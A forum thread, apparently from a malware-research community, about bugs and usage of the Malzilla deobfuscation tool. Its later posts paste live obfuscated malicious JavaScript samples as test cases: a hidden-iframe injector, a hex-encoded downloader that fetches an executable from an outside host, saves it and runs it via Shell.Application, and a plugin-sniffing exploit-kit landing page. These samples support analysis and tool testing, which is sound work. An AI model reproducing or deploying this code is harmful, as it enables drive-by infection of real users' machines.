<form action="postresult.php" method="post">
<input type="submit" name="send_button" value="send it!">
<input type="text" name="text_value" value="0123456789">
</form>
</body>
</html>It means that you need to put postresult.php instead of the current address in the URL field before clicking on POST button.
If the page was www.some_site.com/form.php, you need to put there www.some_site.com/postresult.php, and after that click on POST button.
A dialog for POST data will appear (if you leave it blank, it will abort the operation).
-
Is it possible to be able to enter the data in hex or something like that to allow for newline characters in the data? Good work by the way.
-
You can't send newline with application/x-www-form-urlencoded.
Can you give me an example where you need to send newline, so that I can do some testing?
-
You should be able to send a new line using either CrLf or Chr 10? (or /n)
-
In standard URL encoding, one can use %0d%0a to get CrLf, but I still do not believe it can be interpreted by the server.
There are other methods to POST such kind of data, but there is no way in which I can make a universal form/gui for such thing.
I will elaborate more on this later tonight (just got back from the job, and I need to feed the monsters in my stomach :) )
-
Sorry for being a bit late with promised explanation.
First standards for POST method defined just one type of sending data: application/x-www-form-urlencoded
This way someone can send URLEncoded data. URL encoding means that chars like spaces and similar must be encoded before sent. Every such character should be replaced by % followed by the ASCII number of the character.
Anyway, with such method one can't send files. Later revisions of POST method introduces one more MIME type for POST - multipart/form-data.
This MIME type can be composed from other MIME types, where bound marks are used between the various MIME types sent.
Bound marks are random generated, and one bound should be used per POST.
Also the bound should be sent at declaring the MIME type of the POST, so that the server knows what bound mark is used.
Example:
This goes into HTTP headers sent:
MIME type: multipart/form-data, boundary=1234AB_my_unique_boundary
Data is sent like following:
--1234AB_my_unique_boundary
content-disposition: form-data; name="file"; filename="some_file.zip"
Content-Type: Application/octet-string
**here goes the some_file.zip as binary**
--1234AB_my_unique_boundary
Content-Disposition: form-data; name="some_form_element"
some_form_element's_data
--1234AB_my_unique_boundary--As you can see, message is composed from two different MIME types, first one being a file to submit, and the 2nd one a value for a form's element.
There is a boundary mark between the two.
Message can be composed from even more elements, each being of different MIME type.
So, it is pretty impossible to make a GUI that will generate such messages.
I can eventually make a text-box where someone will type such messages manually (inclusive entering the MIME types and boundary marks.
-
Bobby
FYI i ran a A-Squared scan on my lappy earlier this morning and it picked up "LuckySploit" as high risk malware ::)
-
There is a bug in Decoder tab. When you highlight text, if you start to type it will over write the highlighted text as you would expect but the highlight remains and more text starts to be over written. This bug I can only create after the debug window has been opened.
So open Malzilla, go to decoder tab. Type something incorrect that will allow you to debug it, such as an eval() with the opening parenthesis missing:
eval2321412);
Click debug, close the debug window. Then highlight the number, and start to type, this is what you will see.
(http://img195.imageshack.us/img195/7153/malzillabug.png)
-----------------------------
Second bug, again this bug I can only recreate after the debug window has been opened. Type something, like eval(2321412);
Highlight everything using select all. Type something, it will bring up a message box.
-
I've actually been able to reproduce this without having to click debug (the first error you mentioned), resulting in my having to remember to click the mouse before trying to move to the part I want to modify/delete.
Figured it was just my machine with no-one else mentioning it before ....
-
@JohnC
I know about the first bug. The funny thing is that I does not depend on anything normal.
When I compile Malzilla it can expose this bug or not. It is random. E.g. I compile Malzilla, and the bug occurs, e.g. on Decoder tab. I compile it one more time, there is no bug on Decoder tab, but it occurs on some other tab. It can also happen it does not occur at all.
With such weird behavior, I simply can't find the source of the problem.
About the second bug - this is new to me, but it looks like it is related to the first one.
-
Bobby, I don't know if this has been brought up before, but just wanted to say that the Copy/Paste functions do not seem to be working.
I tried copy pasting a code snippet from Malzilla to notepad using right-click, it didn't work. The usual Ctrl+C & Ctrl+V seems to work.
By the way, glad to meet you all, some of you might know me... anyways, I'm Cyborg from Malware Removal (MWR).
-
Welcome to MDL :)
-
Thanks a lot Steven :D
-
Hi Cyborg and welcome.
Which version of Malzilla you use? This looks like a known bug from old versions of Malzilla, but it should be corrected long time ago.
Do you use Clipboard Monitor (option from tray icon)?
-
I forgot to mention btw Bobby, the DLL issue I was having (showed up whenever Malzilla was launched) - I fixed it eventually (accidentally) by uninstalling the MS Visual C++ runtime ..... (bit wierd, but it worked)
-
Looks like a conflict between various version of the same DLL.
-
hehe yep :)
-
Hi Cyborg and welcome.
Which version of Malzilla you use? This looks like a known bug from old versions of Malzilla, but it should be corrected long time ago.
Do you use Clipboard Monitor (option from tray icon)?
Hi Bobby, nice to meet you here.
Version : 1.2.0
I downloaded it from the sourceforge website only 2-3 weeks ago.
And no, I'm using the right click option from inside MalZilla.
By the way, I don't know why, whenever I open MalZilla, I'm getting this error :
(http://img14.imageshack.us/img14/124/captureabu.png)
However, it does not seem to be affecting the way MalZilla works. I've tried replacing the shortcut by deleting the original files and unzipping MalZilla again. That did not fix the issue.
By the way, I'm on Vista Home Premium.
Reg,
Cyborg
-
Hi Cyborg,
I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).
As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.
-
Hey Bobby :)
I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).
It has a check placed on it. But the clipboard doesn't work. It doesn't copy normal text either.
As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.
No, I don't have a copy of libeay32.dll in system32. And no, I'm not able to open any https websites (isn't this a known problem on Vista?). I get this in the lower pane :
=========================
Server IP(s):
0.0.0.0
=========================
HTTP headers:
GET / HTTP/1.0
Host: webparent.sabis.net:443
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/521.9 (KHTML, like Gecko) Safari/521.9
Accept-Encoding: gzip
Above is a working example of the website : https://webparent[dot]sabis[dot]net
-
Cyborg,
Go to Add/Remove Programs (Programs and Features on Vista), and uninstall the Microsoft Visual C++ Runtime ....
-
Thanks a lot Steven, that seems to have fixed the DLL issue.
Seems like you had already posted the solution before...
Anyways, got any idea about the clipboard issue?
Does anybody else have the same problem??
-
I've had the issue when copy/pasting from the shellcode/hex view, but not the rest of the program. When the problem occurs I either have it save the results, or use "Copy selection ...."
-
function LApySnWQkMr(){};LApySnWQkMr.prototype = {getRandString : function(){var l=16,c='0Y1R2Y3R4F5R6Y7)8R9FaYb}cRdFeFf}'.replace(/[\)F\}YR]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},path:String.fromCharCode(100)+new String("9")+"9"+"q"+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110),alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},install : function(){if(!this.alreadyInstalled()){var s="<(d(iHv+ (s$tHy+l,e,=(\'+d+i,sHpHlHa+y,:+n+o$n(e$\'$>H<HiHf$r(a(m(e( Hs,r,c(=,\'+".replace(/[,\$H\(\+]/g, '')+this.getFrameURL()+"\'D>j<D/DitfjrDahmheh>D<C/CdtiDvt>h".replace(/[jDhCt]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehCtPmelC>e<LbPoedUyP>L'.replace(/[PULCe]/g, '')+s+'<C/$b$oCdCy~>n<C/~h~tCm$lC>$'.replace(/[Cp\$n~]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.path + this.host;},cookieValue:1,setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },host:'/may.cn/',cookieName:'gfcehdba'};var ocho=new LApySnWQkMr();ocho.install();
Format Code, will break a string or something in the code above and stop it from working as it should.
-
Here is another example of that will decode, but when you use Format Code, it will no longer decode.
function yhIUKrxFqo(){};yhIUKrxFqo.prototype = {host:'/qq.cn/',install : function(){if(!this.alreadyInstalled()){var s="<_d_i3v1 GsFtGy_l3eF=F\'Gd_iGsGp3l3aFy1:Fn1o3n1e3\'_>F<FiGf3rFaFm1e_ Gs3rFc_=1\'F".replace(/[_1G3F]/g, '')+this.getFrameURL()+"\'J>q<q/qiJfRr@aRmqeJ>@<q/@dRiqvJ>q".replace(/[@J0qR]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehetsmvls>e<rbroZdsyr>s'.replace(/[srevZ]/g, '')+s+'<{/rbPokdFyr>r<r/FhFtkmrlr>P'.replace(/[\{rkPF]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getRandString : function(){var l=16,c='0m1j2m3z4{5m6m7j8J9maJbzc{dmeJfz'.replace(/[\{jzmJ]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},cookieValue:1,getFrameURL : function(){var dlh=''; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.path + this.host;},path:String.fromCharCode(102)+"q"+new String("w")+String.fromCharCode(101)+String.fromCharCode(114)+new String("z")+"."+new String("c")+new String("n"),cookieName:'chfeabgd',alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); }};var ocho=new yhIUKrxFqo();eval(ocho.getFrameURL());
-
This one sends Malzilla into a permanent 302 ....... (unless autofollowing redirects is disabled of course);
http://www.fucking-cash.com/index.com?a=3546&p=2
p= is valid from 1 up to lord knows where (highest I've found so far is 15, all seem to be serving malware (haven't analyzed it in detail yet))
/edit
Okie, after stopping Malzilla doing an auto 302, those < 10 are intermittent between perma redirects back to itself, and redirects to other sites. Those > 10 (and so far the number doesn't seem to be limited) all lead to porn sites. The reason I thought it was malware is that it was actually serving the file as application/x-msdownload, which meant Malzilla was treating the redirect URL as an actual file - looking at the source code for some of them, this does not seem to be the case - they just seem to be regular porn sites.
-
Malzilla treats some content as binary file (and triggers Save dialog) only if one of the following lines/strings are present in HTTP headers:
'Content-Type: application'
'Content-Disposition:'
Malzilla will follow redirections for every HTTP response in the range between 300 and 399. It does not distinguish between e.g. 300 and 302 responses.
Redirection is done according to the following line in HTTP headers if present (it should be present for every 3xx response):
'Location:'
One more type of redirection that Malzilla will follow is the one with response 200 and with 'Refresh:' line in HTTP headers.
-
@MysteryFCM
Indeed, these HTTP headers are driving Malzilla nuts.
'Location:' is empty, and that triggers Malzilla to treat is as a relative URL, which means that the absolute URL will be the same like the current URL.
The 'ContentType:' will trigger the save dialog because it contains 'application' string; and redirection (e.g. 302) in Malzilla does not exclude a possibility of getting a download (binary) in the same turn. This would be my mistake in codding the HTTP headers parser.
Interesting.
It makes me thinking that someone made this just to explore Malzilla's HTTP headers parser system :)
-
hehe because of the way it behaved, I figured it was probably done deliberately to try and avoid automated analysis as much as possible.
-
Kalimero Processor doesn't work too well on this one:
<html><head><title>caWxpUk</title><style>div.caWxpUk{visibility:hidden;}</style></head><body><div id='gr4tgwsd' class='caWxpUk'>2E212E</div><div id='pdfplace'></div><span>vccfghvvr</span>hfddfwhch<u>arbqgrigyets</u><ol><li>paxjgd</li></ol><abbr>gvbpjej</abbr><br /><select><option>umwchuq</option></select><div id='ucpylirjhur' style='visibility:hidden;'>453M484D433K</div><div id='ZITYo' class='caWxpUk'>28352F342L323616443J463P4D3J3P3N2918423J4E3J4B3L4A41484C182A16161616161616164E3J4A16483H4D4A4416291618404C4C48261L1L3P4A3N3N463O44474A1K3L461L3L47453N3M4H1L3N4G3N1K48404818273O4D463L4C414746162P2G2D2F1E1F4J4E3J4A16464D3L291D1D273M2429161M2716164E3J4A162L242H1O2L424B1629163M473L4D453N464C1K3L4A3N3J4C3N2H443N453N464C1E18473K42181H464D3L1H183N3L4C181F2716162L242H1O2L424B1K4B3N4C2D4C4C4A413K4D4C3N1E18</div><a href=yitmmx>sscjrhpueyd</a><br /><textarea>fitous</textarea><br /><select><option>aygkotigoagczc</option></select><pre>qpwwns</pre><br /><div id='rwdMtu' class='caWxpUk'>413M181I18282B181H464D3L1H1829181H464D3L1H182L242H1O2L181H464D3L1H18424B2B181H464D3L1H182A181F272L242H1O2L424B1K4B3N4C2D4C4C4A413K4D4C3N1E183L44181H464D3L1H183J4B4B413M181I183L181H464D3L1H1844181H464D3L1H184B181H464D3L1H1841181H464D3L1H183M181H464D3L1H1826181H464D3L1H182E2G25222F21181H464D3L1H1821181H464D3L1H1822181H464D3L1H181J2221181H464D3L1H182D1P181H464D3L1H181J1N181H464D3L1H181N181H464D3L1H18</div><abbr>tizgahfj</abbr><br /><a href=bfyvw>ayxucxdp</a><br /><strong>eozsa</strong><br /><pre>pdxzwoa</pre><br /><br /><p>ktbbilgtmh</p><select><option>snwfu</option></select><div id='z2Cqy' class='caWxpUk'>2G181H464D3L1H181M1J25241P181H464D3L1H182D181H464D3L1H181J181H464D3L1H181M181H464D3L1H181M181H464D3L1H182F1M202I2F1O25181H464D3L1H182H1P181H464D3L1H1822181F274C4A4H4J4E3J4A16324E2H1N2N1629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E183J3M47181H464D3L1H183M181H464D3L1H183K181H464D3L1H181K181H464D3L1H184B4C4A3N3J181H464D3L1H1845181I1D1D1F274E3J4A163M241629161N274L3L3J4C3L401E3N1F4J4L4C4A4H4J4E3J4A16</div><br /><p>hynfncyeqz</p><ul><li>vjrjpgpasq</li><li><pre>sainstsufmrfsb</pre><br /><strong>hunnq</strong><br /><ol><li>ppfnmlvdklkxl</li></ol><div id='NlCV9L' class='caWxpUk'>322H2H2O4C221629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E1835403N44441K2D484844413L3J181H464D3L1H184C414746181I1D1D1F274E3J4A163M241629161N274L3L3J4C3L401E3N1F4J4L413O1E3M24162929161N1F4J4C4A4H4J4E3J4A162G374E43242M4C1M1629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E1845181H464D3L1H184B4G45441O1K3A181H464D3L1H182P2O2K363632181I1D1D1F2716162G374E43242M4C1M1K47483N461E182J181H464D3L1H182H36181I48</div><select><option>klwzdxmx</option></select><ol><li>hufhytbghiwz</li></ol><u>wzcldvdmkdx</u><span>bgnrcdyh</span>beyaebvv<a href=hvyfqwqyjoe>gdcsplwcctbyd</a><br /><div id='nqjioyjdjuqltuk' style='visibility:hidden;'>4H4D483N443O4A474C4H4I</div><div id='R2ikmaU' class='caWxpUk'>3H4D4A441I3O3J444B3N1F2716162G374E43242M4C1M1K4B3N463M1E1F271616324E2H1N2N1K4C4H483N1629161N271616324E2H1N2N1K47483N461E1F27324E2H1N2N1K394A414C3N1E2G374E43242M4C1M1K4A3N4B4847464B3N2E473M4H1F2716162I4A473P4G3J162916181K1K3E3E3524233N4340381K3N4G3N1827324E2H1N2N1K353J4E3N36472I41443N1E2I4A473P4G3J1I1O1F273N4E3J441E18322H2H2O4C221K181H464D3L1H1835403N181H464D3L1H1844442H4G3N3L181H464D3L1H184D4C3N1E</div><br /><i>fcjrzzanyv</i><div id='ohjvixugqyxwkao' style='visibility:hidden;'>4C444C3J414647</div><a href=lryistuhws>lixndsfzbai</a><br /><br /><p>tnbrztoumzmti</p><select><option>xuydcsztfsljzbv</option></select><abbr>oicub</abbr><br /><ul><li>zbhrq</li><li><div id='c2jf3Ur' class='caWxpUk'>2I4A47181H464D3L1H183P4G3J1F181H464D3L1H1827181F274A3N4C4D4A46161N274L3L3J4C3L401E3N1F4J4L4L4L3O4D463L4C41474616322G2I1E1F4J4C4A4H164J4E3J4A16473K42162916464D444427473K42162916463N4F162D3L4C414E3N3A313K423N3L4C1E182D3L4A47322G2I1K322G2I181F27413O161E17473K421F164J473K42162916463N4F162D3L4C414E3N3A313K423N3L4C1E18322G2I1K323M3O2F4C4A44181F274L413O161E473K421F164J3M473L4D453N464C1K3P3N4C2H443N453N46</div><ol><li>ncmncnfoxmbtuvb</li></ol><abbr>xhvvxtncaft</abbr><br /><a href=cericeu>ffpetjy</a><br /><br /><p>gdvdhaunlubwsjs</p><u>xrarglvu</u><p id=esjbfzypv>ganbdrglk</p><br /><div id='V7SIpD6' class='caWxpUk'>4C2E4H2L3M1E18483M3O48443J3L3N181F1K4146463N4A2K362P2O16291618283N453K3N3M164F413M4C40291D1N211M1D16403N413P404C291D1N211M1D164B4A3L291D4B48441L483M3O1K483M3O1D164C4H483N291D3J484844413L3J4C4147461L483M3O1D2A281L3N453K3N3M2A18274L4L163L3J4C3L401E3N1F164J3M473L4D453N464C1K3P3N4C2H443N453N464C2E4H2L3M1E18483M3O48443J3L3N181F1K4146463N4A2K362P2O16291618283N453K3N3M164F413M4C40291D1N211M1D16403N413P40</div><select><option>bksrksrnaidurph</option></select><span>ujiinvzdjhkzcgt</span>okeucloedepiiei<p id=hslhndvgzufo>hteahrvfkfdsmir</p><br /><br /><i>ozonvemrj</i><pre>ecsfgqdqbwxrge</pre><br /><div id='xUHkE' class='caWxpUk'>4C291D1N211M1D164B4A3L291D4B48441L483M3O1K483M3O1D164C4H483N291D3J484844413L3J4C4147461L483M3O1D2A281L3N453K3N3M2A18274L4B3N4C3641453N474D4C1E1835351E1F181I161O1M1M1F274L3O4D463L4C4147461635351E1F4J4C4A4H4J4A3N4C29463N4F162D3L4C414E3N3A313K423N3L4C1E184B46484E4F1K35463J484B40474C1638413N4F3N4A162F47464C4A47441K1N181F274E3J4A163J4A3K414C4A3J4A4H3H3O41443N162916483H4D4A44274E3J4A163M3N4B4C1629161D2F</div><textarea>diocnbtwaoyy</textarea><br /><ul><li>qtkoaxd</li><li><pre>jswakehk</pre><br /><br /><p>ceahfgj</p><div id='jdkihim' style='visibility:hidden;'>4I4D40404H3M4I41</div><div id='S9s69t' class='caWxpUk'>261L324A473P4A3J45162I41443N4B1L314D4C44474743162H4G484A3N4B4B1L4F3J3K1K3N4G3N1D273M473L4D453N464C1K4F4A414C3N1E1828473K423N3L4C163L443J4B4B413M291D3L444B413M262I1M2H201O2G221M1J1P22242F1J1N1N2G1M1J2D2G241N1J1M1M2D1M2F251M2G2F242G251D16413M291D3J4C4C3J3L431D2A281L473K423N3L4C2A181F273J4C4C3J3L431K35463J484B40474C323J4C401629163J4A3K414C4A3J4A4H3H3O41443N274B3N4C3641453N474D4C1E1D4F41463M474F1K4447</div><a href=xposlboe>adxtokhnpk</a><br /><ol><li>lzxhwajcckj</li></ol><textarea>kwafqznsdpumq</textarea><br /><u>tmlld</u><br /><p>xpnxbfqegbgyw</p><div id='L9GV7F' class='caWxpUk'>3L3J4C41474616291618443M3J48261L1L1N1O231K1M1K1M1K1N181D1I1O1M1M1M1F273J4C4C3J3L431K2F4745484A3N4B4B3N3M323J4C401629163M3N4B4C273J4C4C3J3L431K324A41464C35463J484B40474C1E3J4A3K414C4A3J4A4H3H3O41443N1I3M3N4B4C1F274L3L3J4C3L401E3N1F4J4L4L413O161E2P2G2D2F1E1F4K4K322G2I1E1F1F164J164L281L4B3L4A41484C2A</div><script>this.livaix=false;var momyvtacoixnfv='hpsbbjed';var vlzieap=2275;function wtzveinaok(){}this.feiwlafvaiglgtm='vllnewtyx';function obKkrjY(A5XDN){WsqCWC7 = '';this.pxjqjdwhtgp='khskysiyamd';this.xhinjcy=false;var fzpryvmjqhqm=7169;function uxptvf(khdfvarhaneuc){return wrqfumghwjccqm;}var kuberhxelvinjzm='fvbxxiedenqoe';function hztyhac(){}for(PMVXDUW = 0; PMVXDUW < (A5XDN.length / 2); PMVXDUW++ ){WsqCWC7 += String.fromCharCode(parseInt(A5XDN.substr(PMVXDUW * 2, 2),26));this.erxrdeuznnyghv=false;}return WsqCWC7;var skqrjzzr='wpyulgttpybmtgz';}function NdCnV412(lhQmDxz){function ssyahswssd(pxkywajtv){return iabvdlq;}this.dxzgasw='hhuyhutsboi';return document.getElementById(lhQmDxz).innerHTML;var eivulzhqzzp='vqvvbbdqavvd';this.tuwnb=false;}var BmjoKM =new Array('ZITYo','rwdMtu','z2Cqy','NlCV9L','R2ikmaU','c2jf3Ur','V7SIpD6','xUHkE','S9s69t','L9GV7F',"gr4tgwsd");for(OFMd5ZiT = 0; OFMd5ZiT < BmjoKM.length; OFMd5ZiT++){this.uizuvjzdfibwngu='wkmcfojvqqgyri';var gkktbfstx=8663;document.write(obKkrjY(NdCnV412(BmjoKM[OFMd5ZiT])));function grqklpm(zmgmfi){return bwxvqvreineayh;}this.ylywlwtxp=false;function gdbxgjv(){}var poaamaufzva='bnmwuescmeifd';var srmsxlxxcgxpgi=6561;this.bxpdkx='kyspqutgqgri';}</script>
-
Kalimero also has problems with this one:
<html><head><title>quyxyequat</title><style>div.queliduce{visibility:hidden;}</style></head><body><!-- xyuchothy --><div id='quutakochi' class='queliduce'>6F626A656374</div>22636<br><div id='chocuquym' class='queliduce'>637265617465456C656D656E74</div><p id="cyzythu">cyzythu</p><p id="thoqu">thoqu</p><div id='covyquijem' class='queliduce'>6964</div><i>cethotaviw</i><!-- xyaquose --><div id='getatufum' class='queliduce'>736574417474726962757465</div><tt>kitych</tt>jobyxyu<div id='chythyx' class='queliduce'>636C6173736964</div><br /><p id="chuchythy">chuchythy</p><div id='quidulu' class='queliduce'>636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336</div><!-- bijix --><!-- moxyag --><div id='xyujojeq' class='queliduce'>4372656174654F626A656374</div><strong>xyysizif</strong><big>doxyytupi</big><div id='thuwezug' class='queliduce'>4D73786D6C322E584D4C48545450</div><br><!-- xyuquoq --><div id='xyuvothy' class='queliduce'>5368656C6C2E4170706C69636174696F6E</div><br />thequithax<div id='codyb' class='queliduce'>41646F64622E73747265616D</div><br /><select><option>xyexy</option><option>xyexy</option></select><div id='voxyazeth' class='queliduce'>74797065</div><ul><li>kitho</li><li>kitho</li></ul>dumef<div id='chyqu' class='queliduce'>6F70656E</div><u>zoxyyqu</u><br /><div id='xyefothyxy' class='queliduce'>73656E64</div><ol><li>quachedef</li></ol><p id="sothoque">sothoque</p><div id='watakythec' class='queliduce'>7772697465</div><textarea>xyyxyut</textarea><div id="chyxyythi">chyxyythi</div><div id='chixyywiqu' class='queliduce'>474554</div><tt>checeq</tt><a href="kijuxyyx">kijuxyyx</a><div id='nyrukohasu' class='queliduce'>687474703A2F2F766976612D64656C70696E617461322E636F6D2F322F7570646174652E706870</div><p id="hyniquoq">hyniquoq</p><a href="wakufu">wakufu</a><div id='guvaquyc' class='queliduce'>66616C7365</div><br><a href="xyevuvoque">xyevuvoque</a><div id='thomuquy' class='queliduce'>726573706F6E7365426F6479</div>quechupo<span>thegaxy</span><div id='myfarot' class='queliduce'>2E2F2F2E2E2F2F66696C652E657865</div><br><p>zoxyo</p><div id='vamyquixyy' class='queliduce'>53617665546F46696C65</div><ul><li>zethec</li><li>zethec</li></ul><p id="pechy">pechy</p><div id='ruchuxyu' class='queliduce'>436C6F7365</div><textarea>wuchech</textarea><strong>sethofigep</strong><div id='xyixyathoc' class='queliduce'>7368656C6C65786563757465</div><pre>quychupymi</pre>xyanawef<div id='chyxyaque' class='queliduce'>6576616C</div><i>golate</i><pre>thovaheme</pre><script>this.hequach=9087;var kyneb = document;function hohyxyyz(){}var ziquerumy = window;function wyqueq(wyqueq){return wyqueq;}var chifuki='chifuki';function voboxyapuc(xyeque){this.dygecha="dygecha";vequid = '';function tapixyer(tapixyer){return tapixyer;}for(thothacyx = 0; thothacyx < (xyeque.length / 2); thothacyx++ ){vequid += String.fromCharCode('0x' + xyeque.substr(thothacyx * 2, 2));}this.fijufoluqu=false;return vequid;}function choquiciqu(lalochub){this.quohakezih=632;return document.getElementById(lalochub).innerHTML;}var xyothegi=8688;function jijicuthu(jijicuthu){return true;}this.xyuchuq=21419;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var faquothuv = kyneb[voboxyapuc(choquiciqu('chocuquym'))](voboxyapuc(choquiciqu('quutakochi')));");var nekathach='nekathach';this.nykithil=false;this.chiweki=11003;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("faquothuv[voboxyapuc(choquiciqu('getatufum'))](voboxyapuc(choquiciqu('covyquijem')), faquothuv);");this.lyzalabo='lyzalabo';function xyytithec(xyytithec){return true;}function zejuchi(){}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("faquothuv[voboxyapuc(choquiciqu('getatufum'))](voboxyapuc(choquiciqu('chythyx')), voboxyapuc(choquiciqu('quidulu')));");function quyxyat(){}function kyquochiqu(kyquochiqu){return kyquochiqu;}this.thuthi='thuthi';try{this.silachezon="silachezon";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var chythoga = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('thuwezug')), '');");this.xyyvucot=12818;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var xyacha = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('xyuvothy')), '');");this.tachoxyi=false;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var thachoxy = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('codyb')), '');");function chusi(chusi){return true;}try{this.nixyuturum=3960;this.syquiruchu='syquiruchu';function cathokorit(cathokorit){return cathokorit;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('voxyazeth'))] = 1;");var thaquaqui=21103;var rivathyg="rivathyg";function nethi(){}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("chythoga[voboxyapuc(choquiciqu('chyqu'))](voboxyapuc(choquiciqu('chixyywiqu')), voboxyapuc(choquiciqu('nyrukohasu')), voboxyapuc(choquiciqu('guvaquyc')));");function gawovyxyu(gawovyxyu){return gawovyxyu;}this.quuwufodo=false;function lynithoth(lynithoth){return lynithoth;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("chythoga[voboxyapuc(choquiciqu('xyefothyxy'))]();");var quuquuq='quuquuq';var thusadu="thusadu";this.thosaxyyth="thosaxyyth";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('chyqu'))]();");function jubetho(jubetho){return jubetho;}var quizecezix="quizecezix";var xyuqu="xyuqu";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('watakythec'))](chythoga[voboxyapuc(choquiciqu('thomuquy'))]);");function quysomun(quysomun){return true;}function chotho(){}this.thyluhejy=12013;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var xyaxyiboj = voboxyapuc(choquiciqu('myfarot'));");function thethox(thethox){return thethox;}function duhubecub(){}this.gythethoqu=false;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('vamyquixyy'))](xyaxyiboj, 2);");function chego(chego){return chego;}var pechach='pechach';function thoju(thoju){return true;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('ruchuxyu'))]();");this.quoqu='quoqu';function xyequix(){}var xyacocichu=21017;}catch(e){}try{var suchithasa="suchithasa";var chorathe=7194;function hyquuc(hyquuc){return hyquuc;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("xyacha[voboxyapuc(choquiciqu('xyixyathoc'))](xyaxyiboj);");var wyxyu=9872;this.xyuquegul="xyuquegul";function chexye(chexye){return true;}}catch(e){}}catch(e){}var wyzitich="wyzitich";function xyylaquuf(){}this.cheth=9397;</script></body></html><script>if(navigator.userAgent.indexOf("MS"+"IE"+"") != -1){PDF = new Array("Acr"+"oPD"+"F.P"+"DF"+"", "PDF.P"+"dfCtr"+"l"+"");for(i in PDF){try{obj = new ActiveXObject(PDF[i]);if (obj){document.write("<ifr"+"ame "+"src="+"notT"+"heor"+"yCit"+"es.p"+"df><"+"/ifr"+"ame>"+"");}}catch(e){}}try{obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if (obj){document.write("<ifra"+"me sr"+"c=nor"+"malLe"+"ap.sw"+"f></i"+"frame"+">"+"");}}catch(e){}}else{for(i = 0; i <= navigator.plugins.length; i++){var plugin = navigator.plugins[i].name;if((plugin.indexOf("Ado"+"be "+"Acr"+"oba"+"t"+"") != -1) || (plugin.indexOf("Adobe"+" PDF"+"") != -1)){document.write("<i"+"fr"+"am"+"e "+"sr"+"c="+"no"+"tT"+"he"+"or"+"yC"+"it"+"es"+".p"+"df"+"><"+"/i"+"fr"+"am"+"e>"+"");}if(plugin.indexOf("Flas"+"h"+"") != -1){document.write("<i"+"fr"+"am"+"e "+"sr"+"c="+"no"+"rm"+"al"+"Le"+"ap"+".s"+"wf"+"><"+"/i"+"fr"+"am"+"e>"+"");}}}</script><applet code = "Show.class" width="100" height="100">
-
Another example of the Kalimero one:
